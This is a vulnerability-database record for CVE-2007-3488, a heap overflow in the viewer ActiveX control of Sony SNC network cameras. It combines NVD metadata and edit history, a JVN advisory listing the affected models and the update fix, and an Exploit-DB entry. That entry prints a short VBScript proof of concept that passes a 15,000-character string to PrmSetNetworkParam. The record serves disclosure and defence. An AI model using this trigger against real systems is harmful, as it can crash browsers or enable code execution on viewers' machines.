ID CVE-2007-3488 Type cve Reporter NVD Modified 2017-09-28T21:29:01
Description
Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method.
{"id": "CVE-2007-3488", "bulletinFamily": "NVD", "title": "CVE-2007-3488", "description": "Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method.", "published": "2007-06-29T14:30:00", "modified": "2017-09-28T21:29:01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3488", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/24684", "http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-000012.html", "http://pro.sony.com/bbsc/ssr/cat-securitycameras/resource.downloads.bbsccms-assets-cat-camsec-downloads-AffectedNetworkCameras.shtml", "http://jvn.jp/en/jp/JVN16767117/041520/index.html", "https://www.exploit-db.com/exploits/4120", "http://jvn.jp/en/jp/JVN16767117/index.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/35133"], "cvelist": ["CVE-2007-3488"], "type": "cve", "lastseen": "2017-09-29T14:25:23", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/h:sony:sony_network_camera_snc-p5:1.0"], "cvelist": ["CVE-2007-3488"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method.", "edition": 2, "enchantments": {}, "hash": "610e11e3fbefcc9eea9fee846e8f27247084406183bf2c22bad4e1b3cd9e18b3", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "c24a27c0b00de0af796f241424d09963", "key": "cpe"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "5d5883155415d411189b10e33054da56", "key": "published"}, {"hash": "2b3f9b0686b1e7d0bdf24736f6ddc6c5", "key": "cvelist"}, {"hash": "0e2bd0a644849db967ffc62777470dae", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "767963ff63a86c980cba097c9d2b5253", "key": "modified"}, {"hash": "d0bda4d4e11fce8c747df0d897746afd", "key": "href"}, {"hash": "040aab116caafb920e9188cab90711eb", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "246ebad581a205e9031c2e2af6468002", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3488", "id": "CVE-2007-3488", "lastseen": "2017-07-29T11:22:07", "modified": "2017-07-28T21:32:18", "objectVersion": "1.3", "published": "2007-06-29T14:30:00", "references": ["http://www.securityfocus.com/bid/24684", "http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-000012.html", "http://pro.sony.com/bbsc/ssr/cat-securitycameras/resource.downloads.bbsccms-assets-cat-camsec-downloads-AffectedNetworkCameras.shtml", "http://jvn.jp/en/jp/JVN16767117/041520/index.html", "http://jvn.jp/en/jp/JVN16767117/index.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/35133", "http://www.milw0rm.com/exploits/4120"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-3488", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-07-29T11:22:07"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/h:sony:sony_network_camera_snc-p5:1.0"], "cvelist": ["CVE-2007-3488"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method.", "edition": 1, "enchantments": {}, "hash": "023c305946ea030907739a3c28e031e1757a351a7f7ffe0d65f61d6d392fad14", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "c3f17b2e03fe7763fa743756c830e33d", "key": "modified"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "c24a27c0b00de0af796f241424d09963", "key": "cpe"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "059d23a589e504a374b882c3d934681c", "key": "references"}, {"hash": "5d5883155415d411189b10e33054da56", "key": "published"}, {"hash": "2b3f9b0686b1e7d0bdf24736f6ddc6c5", "key": "cvelist"}, {"hash": "0e2bd0a644849db967ffc62777470dae", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d0bda4d4e11fce8c747df0d897746afd", "key": "href"}, {"hash": "040aab116caafb920e9188cab90711eb", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3488", "id": "CVE-2007-3488", "lastseen": "2016-09-03T09:07:30", "modified": "2009-03-20T01:25:23", "objectVersion": "1.2", "published": "2007-06-29T14:30:00", "references": ["http://www.securityfocus.com/bid/24684", "http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-000012.html", "http://pro.sony.com/bbsc/ssr/cat-securitycameras/resource.downloads.bbsccms-assets-cat-camsec-downloads-AffectedNetworkCameras.shtml", "http://xforce.iss.net/xforce/xfdb/35133", "http://jvn.jp/en/jp/JVN16767117/041520/index.html", "http://jvn.jp/en/jp/JVN16767117/index.html", "http://www.milw0rm.com/exploits/4120"], "reporter": "NVD", "scanner": [], "title": "CVE-2007-3488", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T09:07:30"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "c24a27c0b00de0af796f241424d09963"}, {"key": "cvelist", "hash": "2b3f9b0686b1e7d0bdf24736f6ddc6c5"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "040aab116caafb920e9188cab90711eb"}, {"key": "href", "hash": "d0bda4d4e11fce8c747df0d897746afd"}, {"key": "modified", "hash": "598188312875d205ccfa1613724addfe"}, {"key": "published", "hash": "5d5883155415d411189b10e33054da56"}, {"key": "references", "hash": "7523c916e6c0e1a1ebc8de94f80f0900"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0e2bd0a644849db967ffc62777470dae"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "36bf420bab1f8d1ca48566c0896ec4392a1ca83cfe97695abddc7e8559c66d0a", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-09-29T14:25:23"}, "dependencies": {"references": [{"type": "jvn", "idList": ["JVN:16767117"]}, {"type": "osvdb", "idList": ["OSVDB:39479"]}, {"type": "exploitdb", "idList": ["EDB-ID:4120"]}], "modified": "2017-09-29T14:25:23"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/h:sony:sony_network_camera_snc-p5:1.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"jvn": [{"lastseen": "2018-08-31T00:36:29", "bulletinFamily": "info", "description": "\n ## Description\n\nThe ActiveX Control for Sony SNC series network cameras is a software to monitor images over the network using a web browser. This ActiveX Control contains a heap-based buffer overflow vulnerability triggered by the improper processing of some configuration variables. \n\n ## Impact\n\nA remote attacker could execute arbitrary code. \n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the vendor. \n\n ## Products Affected\n\nTerminals where an ActiveX Control module is installed from the following systems: \n\n\n * SNC-RZ25N prior to 1.30\n * SNC-P1 prior to 1.29\n * SNC-P5 prior to 1.29\n * SNC-CS10 prior to 1.06\n * SNC-CS11 prior to 1.06\n * SNC-DF40N prior to 1.18\n * SNC-DF70N prior to 1.18\n * SNC-RZ50N prior to 2.22\n * SNC-CS50N prior to 2.22\n * SNC-DF85N prior to 1.12\n * SNC-DF80N prior to 1.12\n * SNC-DF50N prior to 1.12\n * SNC-RX570N/W 3.00 or prior to 2.31\n * SNC-RX570N/B 3.00 or prior to 2.31\n * SNC-RX550N/W 3.00 or prior to 2.31\n * SNC-RX550N/B 3.00 or prior to 2.31\n * SNC-RX530N/W 3.00 or prior to 2.31\n * SNC-RX530N/B 3.00 or prior to 2.31\n * SNC-RZ25P prior to 1.30\n * SNC-DF70P prior to 1.18\n * SNC-DF40P prior to 1.18\n * SNC-RZ50P prior to 2.22\n * SNC-CS50P prior to 2.22\n * SNC-DF85P prior to 1.12\n * SNC-DF80P prior to 1.12\n * SNC-DF50P prior to 1.12\n * SNC-RX570P 3.00 or prior to 2.31\n * SNC-RX550P 3.00 or prior to 2.31\n * SNC-RX530P 3.00 or prior to 2.31\n", "modified": "2009-03-09T00:00:00", "published": "2009-02-23T00:00:00", "id": "JVN:16767117", "href": "http://jvn.jp/en/jp/JVN16767117/index.html", "title": "JVN#16767117 Buffer overflow vulnerability in ActiveX Control for Sony SNC series network cameras", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 35133\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4120\n[CVE-2007-3488](https://vulners.com/cve/CVE-2007-3488)\nBugtraq ID: 24684\n", "modified": "2007-06-27T17:11:21", "published": "2007-06-27T17:11:21", "href": "https://vulners.com/osvdb/OSVDB:39479", "id": "OSVDB:39479", "title": "Sony Network Camera SNC-P5 viewer ActiveX PrmSetNetworkParam Method Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:12:05", "bulletinFamily": "exploit", "description": "Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC. CVE-2007-3488. Dos exploit for windows platform", "modified": "2007-06-27T00:00:00", "published": "2007-06-27T00:00:00", "id": "EDB-ID:4120", "href": "https://www.exploit-db.com/exploits/4120/", "type": "exploitdb", "title": "Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC", "sourceData": "<!--\r\nSony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC\r\n\r\nCamera info\r\nhttp://bssc.sel.sony.com/BroadcastandBusiness/DisplayModel?id=79540\r\n\r\nSNC-P5 External API documentation\r\nhttp://www.tracor-europe.info/racine/sony/PROG/P5/API/Documents/SNC-P5APIDocument1.0EN.pdf\r\n\r\n/str0ke ! milw0rm.com \r\n-->\r\n\r\n<script language = 'vbscript'>\r\nSub tryMe()\r\n buff = String(15000, \"A\")\r\n viewer.PrmSetNetworkParam buff, 1\r\nEnd Sub\r\n</script>\r\n\r\n<OBJECT CLASSID=\"CLSID:5CB430A9-CAAC-4C91-AF61-6D410EEE1221\" id=\"viewer\"> </OBJECT>\r\n\r\n<input language=VBScript onclick=tryMe() type=button value=\"Click Me\">\r\n\r\n# milw0rm.com [2007-06-27]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4120/"}]}